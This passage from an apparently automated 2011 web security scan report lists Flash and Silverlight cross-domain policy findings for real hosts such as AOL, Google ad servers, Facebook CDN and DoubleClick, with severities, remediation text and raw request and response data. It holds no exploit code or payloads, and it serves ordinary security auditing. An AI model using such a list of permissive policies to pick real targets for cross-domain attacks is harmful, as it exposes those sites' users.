6.22. http://js.adsonar.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://js.adsonar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.adsonar.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 07 Apr 2009 17:58:21 GMT
ETag: "a3d-466fac2afc940"-gzip
Content-Type: application/xml
Cache-Control: max-age=1800
Expires: Sat, 26 Mar 2011 21:06:16 GMT
Date: Sat, 26 Mar 2011 20:36:16 GMT
Content-Length: 2621
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="assets.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.espn.go.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.quigo.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lonelyplanet.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.mochila.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.conxise.net" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="app.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="media.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="static.scanscout.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="startpage.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.web.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.my.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.news.aol.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="iamalpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="imakealpha.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="aimcreate.mdat.aim.com:30100 " secure="false" />
...[SNIP]...
<allow-access-from domain="*.spinner.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.popeater.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.theboombox.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.opticalcortex.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yourminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.facebook.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.liveminis.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.brightcove.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" to-ports="*" secure="false" />
...[SNIP]...
6.23. http://music.aol.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://music.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: music.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:21 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999998
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...
6.24. http://my.screenname.aol.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.screenname.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:19 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 23:57:10 GMT
ETag: "3f1-49eb66b672180"
Accept-Ranges: bytes
Content-Length: 1009
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=440
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.fantasy-interactive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.digitalcity.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.musicnow.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.aol.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aol.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
6.25. http://o.aolcdn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "86252e13a238a19354a0bc819378c538:1294158341"
Last-Modified: Tue, 04 Jan 2011 16:25:41 GMT
Content-Type: application/xml
Cache-Control: max-age=683105
Expires: Sun, 03 Apr 2011 18:21:22 GMT
Date: Sat, 26 Mar 2011 20:36:17 GMT
Content-Length: 3059
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSc
...[SNIP]...
<allow-access-from domain="*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channels.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.web.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.my.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.estage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="channelevents.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.channel.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn-startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="startpage.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cdn.digitalcity.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="progressive.stream.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.video.office.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.publishing.aol.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.aolcdn.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.tmz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="tmz.warnerbros.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="stage.goldrush.aol.com" to-ports="80"/>
...[SNIP]...
<allow-access-from domain="*.facebook.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.pointroll.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.platformaprojects.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.yourminis.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lightningcast.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.adtechus.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.atwola.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.rtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.advertising.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ad-preview.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.domanistudios.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.icq.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="studionow.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.studionow.com" secure="false"/>
...[SNIP]...
6.26. http://pagead2.googlesyndication.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Fri, 25 Mar 2011 11:49:02 GMT
Expires: Sat, 26 Mar 2011 11:49:02 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 26769
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...
6.27. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-Powered-By: HPHP
X-FB-Server: 10.30.145.195
X-Cnection: close
Date: Sat, 26 Mar 2011 20:36:08 GMT
Content-Length: 1581
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
...[SNIP]...
<allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...
6.28. http://www.aol.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:35:51 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1066
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.channels.aol.com" />
<allow-access-from domain="*.web.aol.com" />
<allow-access-from domain="*.my.aol.com" />
<allow-access-from domain="channelevents.estage.aol.com" />
<allow-access-from domain="channelevents.aol.com" />
<allow-access-from domain="*.office.aol.com" />
<allow-access-from domain="*.channel.aol.com" />
<allow-access-from domain="cdn-startpage.aol.com" />
<allow-access-from domain="startpage.aol.com" />
<allow-access-from domain="cdn.digitalcity.com" />
<allow-access-from domain="progressive.stream.aol.com" />
<allow-access-from domain="ad.doubleclick.net" />
<allow-access-from domain="*.aolcdn.com" />
<allow-access-from domain="*.unicast.com" />
...[SNIP]...
6.29. http://www.blogsmithmedia.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.blogsmithmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.blogsmithmedia.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 23 Dec 2010 02:59:47 GMT
Content-Type: application/xml
Cache-Control: max-age=3600
Expires: Sat, 26 Mar 2011 21:36:18 GMT
Date: Sat, 26 Mar 2011 20:36:18 GMT
Content-Length: 782
Connection: close
X-N: S

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-in
...[SNIP]...
<allow-access-from domain="*.blogsmith.net" to-ports="*" />
   <allow-access-from domain="*.blogsmith.com" to-ports="*" />
   <allow-access-from domain="*.aolcdn.com" to-ports="*" />
   <allow-access-from domain="*.aol.com" to-ports="*" />
   <allow-access-from domain="*.*.aol.com" to-ports="*" />
   <allow-access-from domain="*.yourminis.com" to-ports="*" />
...[SNIP]...
6.30. http://www.citysbest.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.citysbest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.citysbest.com

Response

HTTP/1.1 200 OK
Date: Sat, 26 Mar 2011 20:36:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=999933
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...
6.31. https://www.godaddy.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.godaddy.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 26 Mar 2011 14:31:23 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>
6.32. http://www.paperg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.paperg.com

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:24 GMT
Server: Apache
Last-Modified: Tue, 30 Mar 2010 22:02:28 GMT
ETag: "204-4830bc9102500"
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Sat, 26 Mar 2011 19:13:24 GMT
Content-Type: application/xml
Content-Length: 516
Connection: close
Via: 1.1 AN-0016020122637050

<?xml version="1.0"?>
<!-- http://www.paperg.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*.paperg.com"/>
<allow-access-from domain="*.paperg.net"/>
<allow-access-from domain="*.bostonnow.com"/>
<allow-access-from domain="*.thecrimson.com"/>
<allow-access-from domain="*.thephoenix.com"/>
<allow-access-from domain="*.stuffatnight.com"/>
   <allow-access-from domain="*.weeklydig.com"/>
   <allow-access-from domain="*.newhavenindependent.com"/>
...[SNIP]...
7. Silverlight cross-domain policy  previous  next
There are 11 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

7.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Fri, 25 Mar 2011 19:13:16 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...
7.2. http://api.search.live.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.search.live.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: api.search.live.net

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 339
Content-Type: text/xml
Last-Modified: Tue, 09 Feb 2010 19:32:41 GMT
ETag: 3BAF7A016C7703DE61D4756F06604F7A00000153
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Sat, 26 Mar 2011 20:36:08 GMT
Connection: close
Set-Cookie: _MD=alg=m2&C=2011-03-26T20%3a36%3a08; expires=Tue, 05-Apr-2011 20:36:08 GMT; domain=.live.net; path=/
Set-Cookie: _SS=SID=364A5B686FD04AADA41D834F22CF6274; domain=.live.net; path=/
Set-Cookie: SRCHUID=V=2&GUID=26BADBDF19514AB4915CC4273D4CBB10; expires=Mon, 25-Mar-2013 20:36:08 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110326; expires=Mon, 25-Mar-2013 20:36:08 GMT; domain=.live.net; path=/

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="*"/>
</allow-from>
<gran
...[SNIP]...
7.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Sat, 26 Mar 2011 19:13:28 GMT
Date: Fri, 25 Mar 2011 19:13:28 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...
7.4. http://dominionenterprises.112.2o7.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dominionenterprises.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: dominionenterprises.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:13:30 GMT
Server: Omniture DC/2.0.0
xserver: www147
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...
7.5. http://o.aolcdn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://o.aolcdn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: o.aolcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "d8baf0f1b81f70a7f23356194f1356bd:1219856443"
Last-Modified: Wed, 27 Aug 2008 17:00:43 GMT
Content-Type: application/xml
Cache-Control: max-age=751079
Expires: Mon, 04 Apr 2011 13:14:16 GMT
Date: Sat, 26 Mar 2011 20:36:17 GMT
Content-Length: 338
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
